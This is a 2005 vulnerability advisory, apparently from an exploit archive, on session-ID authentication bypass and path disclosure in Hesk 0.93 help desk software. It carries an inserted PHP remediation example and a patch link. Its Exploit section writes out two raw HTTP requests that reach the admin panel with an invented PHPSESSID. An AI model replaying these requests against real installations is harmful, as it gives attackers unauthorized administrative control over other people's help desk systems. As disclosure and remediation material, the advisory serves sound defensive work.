
OS2A_1003.txt

Posted Sep 23, 2005
Authored by Rajesh Sethumadhavan, Rahul Mohandas, Jayesh KS

Hesk versions 0.93 and prior are vulnerable to authentication bypass and path disclosure vulnerabilities caused by improper validation of the HTTP header. These vulnerabilities can be exploited to bypass the authentication mechanism and to reveal system-specific information.

tags | exploit, web, vulnerability
SHA-256 | 2645a4a964c584ad640884d537dd3c2209e0231c8e3f12c7579589f38c74c645

OS2A

Hesk Session ID Validation Vulnerability


OS2A ID: OS2A_1003

Status:
9/13/2005  Issue Discovered
9/14/2005  Reported to the vendor
9/18/2005  Patch Released
9/20/2005  Advisory Released


Class: Authentication Bypass
Severity: CRITICAL


Overview:
Hesk is PHP-based help desk software that runs on a MySQL database.
It allows setting up a ticket-based support system (helpdesk) for websites.
Hesk versions 0.93 and prior are vulnerable to authentication bypass and path
disclosure vulnerabilities caused by improper validation of the HTTP
header. These vulnerabilities can be exploited to bypass the authentication
mechanism and to reveal system-specific information.


Description:
Multiple vulnerabilities exist in the Hesk ticket-based support system.

1. Authentication Bypass
The 'PHPSESSID' session ID parameter in the HTTP header is not properly
validated. A malicious user can log in to the Administrator account by
sending a random value in the 'PHPSESSID' parameter and posting it to
admin.php. This session ID can then be used to access the administrative
control panel.

This is similar to a previously reported vulnerability where an invalid
user ID and password were submitted. In this case, a randomly chosen
session ID is sent along with the login request.

2. Path Disclosure
Path information can be disclosed in error pages by passing invalid
metacharacters such as "'" or "<" in the 'PHPSESSID' field of the HTTP header.
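The two findings above share one root cause: the application treats whatever the client sends as PHPSESSID as trustworthy, both as proof of login and as a value safe to let reach an error path. The following PHP is an added illustration of that defect class and its remediation; it is not Hesk's code, and the function names (valid_session_id, is_admin_weak, is_admin_hardened, start_session_hardened, do_login) and the session key 'admin_logged_in' are assumed for the example. It shows a gate that only tests for the presence of a session cookie beside one that tests a server-side flag written by a real credential check, rejects session IDs outside PHP's own ID character set before they can be echoed into an error page, and regenerates the ID after login so a client-chosen value never becomes an authenticated session.

```php
<?php
// Added example, not Hesk's code. Function names and the 'admin_logged_in'
// session key are assumptions made for this illustration.
declare(strict_types=1);

// PHP's own session IDs use only [a-zA-Z0-9,-] and are at most 128 characters.
// Anything else (e.g. "'" or "<") is client-crafted; refuse it before it can
// reach session storage or a file-path error message.
function valid_session_id(string $sid): bool
{
    return (bool) preg_match('/^[a-zA-Z0-9,-]{1,128}$/', $sid);
}

// Weak gate: the presence of any PHPSESSID cookie is taken as proof of login,
// so a value the client invented (e.g. "12345") passes.
function is_admin_weak(array $cookie): bool
{
    return isset($cookie['PHPSESSID']) && $cookie['PHPSESSID'] !== '';
}

// Hardened gate: only a flag that the server itself wrote into $_SESSION after
// a successful credential check counts. The cookie value alone proves nothing.
function is_admin_hardened(array $session): bool
{
    return ($session['admin_logged_in'] ?? false) === true;
}

// Start the session so that an unknown or malformed client ID is discarded.
function start_session_hardened(): void
{
    // use_strict_mode: an ID not already known to the server is dropped and a
    // fresh one issued, so a client cannot fixate or invent a session.
    ini_set('session.use_strict_mode', '1');
    ini_set('session.use_only_cookies', '1');

    $name = session_name();
    if (isset($_COOKIE[$name]) && !valid_session_id((string) $_COOKIE[$name])) {
        // Malformed cookie: drop it quietly instead of letting it reach code
        // that might echo it, or a filesystem path, into an error page.
        unset($_COOKIE[$name]);
    }
    session_start();
}

// Credential check that sets the server-side flag only on success and rotates
// the session ID so a pre-set cookie never becomes an authenticated session.
function do_login(string $user, string $pass, string $stored_hash): bool
{
    if (!password_verify($pass, $stored_hash)) {
        return false;
    }
    session_regenerate_id(true);
    $_SESSION['admin_logged_in'] = true;
    $_SESSION['admin_user'] = $user;
    return true;
}

// Usage sketch for an admin page (constructed request values):
// start_session_hardened();
// if (!is_admin_hardened($_SESSION)) { header('Location: admin.php'); exit; }
```

The weak gate is the shape of check that lets a random PHPSESSID reach the control panel; the hardened gate never consults the cookie directly, and with session.use_strict_mode on, PHP itself refuses to adopt an ID it did not issue. Validating the ID's character set up front removes the input that produced the path disclosure, and session_regenerate_id after a successful password_verify closes the fixation angle the advisory's two-step request relies on.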


Impact:
Successful exploitation can result in a compromise of the application and
disclosure of system-specific information.

Affected Systems:
Hesk 0.93 and prior.
Linux (Any), Unix (Any), Windows (Any)

Exploit:
1. HTTP POST request with randomly chosen Session ID:
POST admin.php +
("Host: host_ip
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://host_ip/hesk/admin.php
Cookie: PHPSESSID=12345 <!-- Random Session ID -->
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
user=1&pass=sdfd&a=do_login");

2. GET request to administrative control panel:
GET admin_main.php +
("Host: host_ip
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=12345") <!-- Session ID -->

Solutions:
Patch:
http://www.phpjunkyard.com/extras/hesk_0931_patch.zip
OR Hesk 0.93.1 from
http://www.phpjunkyard.com/free-helpdesk-software.php

Credits:
Rajesh Sethumadhavan, Rahul Mohandas, and Jayesh K.S of OS2A discovered
the vulnerability.